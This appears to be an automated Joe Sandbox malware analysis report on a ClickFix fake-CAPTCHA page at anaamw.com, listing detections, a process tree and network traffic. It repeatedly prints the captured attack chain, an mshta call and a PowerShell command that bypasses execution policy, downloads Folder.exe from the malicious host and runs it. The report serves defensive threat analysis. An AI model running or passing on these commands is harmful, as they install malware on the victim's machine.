Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
https://anaamw.om/p3.php/1

Overview

General Information

Sample URL:https://anaamw.om/p3.php/1
Analysis ID:1654830
Infos:

Detection

CAPTCHA Scam ClickFix
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detect drive by download via clipboard copy & paste
Multi AV Scanner detection for dropped file
Yara detected CAPTCHA Scam ClickFix
AI detected suspicious Javascript
Bypasses PowerShell execution policy
HTML page adds supicious text to clipboard
HTML page contains obfuscated javascript
Powershell drops PE file
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 6580 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 7108 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1912,i,8822539610411515433,2458465651677738327,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2224 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 2824 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://anaamw.om/p3.php/1" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • mshta.exe (PID: 8100 cmdline: "C:\Windows\system32\mshta.exe" https://anaamw.com/p3.php MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 5972 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Captcha.exe (PID: 7280 cmdline: "C:\ProgramData\Captcha.exe" MD5: CBB05282E7039F0CCFBC1FBB455F14CB)
  • cleanup

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
dropped/chromecache_71JoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security

    HTML

    SourceRuleDescriptionAuthorStrings
    1.3.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
      1.1.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security

        Sigma Signatures

        System Summary

        barindex
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://anaamw.com/p3.php, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 8100, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", ProcessId: 5972, ProcessName: powershell.exe
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://anaamw.com/p3.php, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 8100, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", ProcessId: 5972, ProcessName: powershell.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://anaamw.com/p3.php, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 8100, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", ProcessId: 5972, ProcessName: powershell.exe
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://anaamw.com/p3.php, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 8100, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", ProcessId: 5972, ProcessName: powershell.exe
        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5972, TargetFilename: C:\ProgramData\Captcha.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://anaamw.com/p3.php, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 8100, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", ProcessId: 5972, ProcessName: powershell.exe
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://anaamw.com/p3.php, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 8100, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", ProcessId: 5972, ProcessName: powershell.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://anaamw.com/p3.php, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 8100, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", ProcessId: 5972, ProcessName: powershell.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-04-02T16:59:24.188854+020018100032Potentially Bad Traffic66.96.147.114443192.168.2.1850010TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-04-02T16:59:24.188430+020018100002Potentially Bad Traffic192.168.2.185001066.96.147.114443TCP

        Joe Sandbox Signatures

        • AV Detection
        • Phishing
        • Compliance
        • Software Vulnerabilities
        • Networking
        • System Summary
        • Data Obfuscation
        • Persistence and Installation Behavior
        • Hooking and other Techniques for Hiding and Protection
        • Malware Analysis System Evasion
        • HIPS / PFW / Operating System Protection Evasion
        • Language, Device and Operating System Detection

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: https://anaamw.com/p3.php/1?jsAvira URL Cloud: Label: malware
        Source: https://anaamw.com/favicon.icoAvira URL Cloud: Label: malware
        Source: https://anaamw.com/p3.phpAvira URL Cloud: Label: malware
        Source: https://anaamw.com/Folder.exeAvira URL Cloud: Label: malware
        Source: C:\ProgramData\Captcha.exeAvira: detection malicious, Label: TR/Redcap.ivwok
        Source: C:\ProgramData\Captcha.exeReversingLabs: Detection: 37%

        Phishing

        barindex
        Source: Yara matchFile source: 1.3.pages.csv, type: HTML
        Source: Yara matchFile source: 1.1.pages.csv, type: HTML
        Source: Yara matchFile source: dropped/chromecache_71, type: DROPPED
        Source: 1.4..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://anaamw.com/p3.php/1... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It appears to be a malicious script designed to execute remote commands and potentially steal user data. The combination of these factors indicates a high risk of harm and should be treated with caution.
        Source: https://anaamw.com/p3.php/1HTTP Parser: (function(_0x4a4c13,_0x1ba179){const _0x10f3e2=_0x2875,_0x478ffb=_0x4a4c13();while(!![]){try{const _
        Source: https://anaamw.com/p3.php/1HTTP Parser: No favicon
        Source: https://anaamw.com/p3.php/1HTTP Parser: No favicon
        Source: https://anaamw.com/p3.php/1HTTP Parser: No favicon
        Source: https://anaamw.com/p3.php/1HTTP Parser: No favicon
        Source: unknownHTTPS traffic detected: 142.251.41.4:443 -> 192.168.2.18:49712 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 66.96.147.114:443 -> 192.168.2.18:49810 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 66.96.147.114:443 -> 192.168.2.18:49811 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 66.96.147.114:443 -> 192.168.2.18:49825 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 150.171.84.18:443 -> 192.168.2.18:50002 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 150.171.84.18:443 -> 192.168.2.18:50004 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 66.96.147.114:443 -> 192.168.2.18:50009 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 66.96.147.114:443 -> 192.168.2.18:50010 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.80.42:443 -> 192.168.2.18:50019 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.80.14:443 -> 192.168.2.18:50020 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.80.42:443 -> 192.168.2.18:50021 version: TLS 1.2
        Source: chrome.exeMemory has grown: Private usage: 13MB later: 39MB
        Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.18:50010 -> 66.96.147.114:443
        Source: Network trafficSuricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 66.96.147.114:443 -> 192.168.2.18:50010
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.7
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.7
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 142.250.80.99
        Source: unknownTCP traffic detected without corresponding DNS query: 208.89.73.21
        Source: unknownTCP traffic detected without corresponding DNS query: 208.89.73.21
        Source: unknownTCP traffic detected without corresponding DNS query: 142.250.80.99
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 150.171.84.18
        Source: unknownTCP traffic detected without corresponding DNS query: 150.171.84.18
        Source: unknownTCP traffic detected without corresponding DNS query: 150.171.84.18
        Source: unknownTCP traffic detected without corresponding DNS query: 150.171.84.18
        Source: unknownTCP traffic detected without corresponding DNS query: 150.171.84.18
        Source: unknownTCP traffic detected without corresponding DNS query: 150.171.84.18
        Source: unknownTCP traffic detected without corresponding DNS query: 150.171.84.18
        Source: unknownTCP traffic detected without corresponding DNS query: 150.171.84.18
        Source: unknownTCP traffic detected without corresponding DNS query: 150.171.84.18
        Source: unknownTCP traffic detected without corresponding DNS query: 150.171.84.18
        Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /p3.php/1 HTTP/1.1Host: anaamw.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /p3.php/1?js HTTP/1.1Host: anaamw.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://anaamw.com/p3.php/1Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: anaamw.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anaamw.com/p3.php/1Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: anaamw.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /apc/trans.gif?a38ce52767fa2b26b2add34685ee7810 HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: portal.azure.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /p3.php HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: anaamw.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /Folder.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: anaamw.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mshta+https%3A%2F%2Fanaamw.com%2Fp3.php&oit=4&cp=31&pgcl=7&gs_rn=42&psi=gTcE_khvmMX2SDHf&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.24R2mrw_td8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9vR1rNwOjC3PXOxUlyKiCwNBv2Fg/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*X-Client-Data: CPyDywE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficDNS traffic detected: DNS query: anaamw.om
        Source: global trafficDNS traffic detected: DNS query: google.com
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: anaamw.com
        Source: global trafficDNS traffic detected: DNS query: ogads-pa.clients6.google.com
        Source: global trafficDNS traffic detected: DNS query: apis.google.com
        Source: global trafficDNS traffic detected: DNS query: play.google.com
